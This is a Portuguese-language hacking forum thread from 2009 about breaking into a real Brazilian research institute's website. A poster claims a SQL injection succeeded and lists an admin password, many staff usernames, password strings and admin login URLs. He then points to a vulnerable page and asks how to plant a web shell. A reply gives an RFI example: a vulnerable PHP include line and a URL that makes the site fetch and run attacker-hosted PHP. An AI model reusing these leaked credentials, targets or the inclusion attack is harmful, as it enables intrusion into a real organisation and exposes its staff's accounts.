ola galera aqui sou eu denovo estudando SQL injection o problema é o seguinte fiquei horas estudando é etc.. estudei estudei é consegui a senha do site é o login
login: admin
senha:npfid23
npfid23
PAINEL PARA SE LOGAR
http://www.ibict.br/adm/index.php
outras senhas
logins:
admin:
kuramoto:
bianca:
ccn:
pedro:
elenice:
davilene:
dilene:
carla:
dici:
angel:
alysson:
beth:
priscilla:
marcos:
ramon:
meinert:
regina:
tonia:
thome:
medeiros:
arthur:
daniela:
simoneb:
claudia:
juliana:
senhas
npfid23:
npfid24:
npfid25:
npfid26:
ccn3000:
npfid32:
npfid34:
npfid36:
carlaibict:
npfid41:
npfid42:
npfid45:
npfid77:
anael:
npfid66:
pfauvn2009:
aloalo08:
npfid53:
70736080:
npfid57:
npfid59:
npfid52:
npfid68:
npfid71:
4210:
npfid72:
más não consigo me logar no site :'(
Tem certeza que esses logins são desse painel de administração?
http://sbrtv1.ibict.br/referenciais/
http://marketing.ibict.br/marketing/asp/loginunb.asp
http://www.ibict.br/seer/ojs/login.php
http://revista.ibict.br/index.php/ciinf/login/signIn
http://bdtd.ibict.br/index.php?option=com_wrapper&Itemid=43
http://cops.ibict.br/login/index.php?lang=en_utf8
:D
desculpa pelo flood foi mal sem querer :'(
valews pela ajuda más a senha não funciounou em nenhum painel
eu queria tirar uma duvida simples também é possivel fazer RFI+SQL INJECTION EX: se eu conseguir se logar nesse site seria possivel colocar uma shell nesse site ??
o usuario reeves(espero que tenha escrito o nome certo)
em uma postagen minha ele disse que a input tava aberta que dava ate para upar uma shell (não tenho a minima ideia de como fazer isso)
input aqui http://www.ibict.br/noticia.php?id=676
minha postagen http://www.forum.darkers.com.br/index.php?topic=12241.15
se da pra fazer isso como eu faria ??
li o post errado e falei merda, mals o flood.
Quote from: n4n0t3rr0r on 28 de December , 2009, 11:32:51 AM
li o post errado e falei merda, mals o flood.
É DESCULPA AEE PELO FLOOD
Quote from: pinguinacs on 28 de December , 2009, 11:08:07 AM
valews pela ajuda más a senha não funciounou em nenhum painel
eu queria tirar uma duvida simples também é possivel fazer RFI+SQL INJECTION EX: se eu conseguir se logar nesse site seria possivel colocar uma shell nesse site ??
o usuario reeves(espero que tenha escrito o nome certo)
em uma postagen minha ele disse que a input tava aberta que dava ate para upar uma shell (não tenho a minima ideia de como fazer isso)
input aqui http://www.ibict.br/noticia.php?id=676
minha postagen http://www.forum.darkers.com.br/index.php?topic=12241.15
se da pra fazer isso como eu faria ??
RFI = Inclusão Remota de Arquivos
No PHP é quando temos algo muito tosco, tipo:
<?php include $_GET['url']; ?>
Pra explorar um bug desses, é meio óbvio lol...
http://site.com/script.php?url=http://seusite.com/seuscript.txt
O teu script.txt vai conter algum php maligno.. Mas pra isso funcionar, no config do php, tem que estar permitido allow url file inclusion.. é burrice deixar isso ligado se vc não precisa!
valews más nao intendo nada de RFI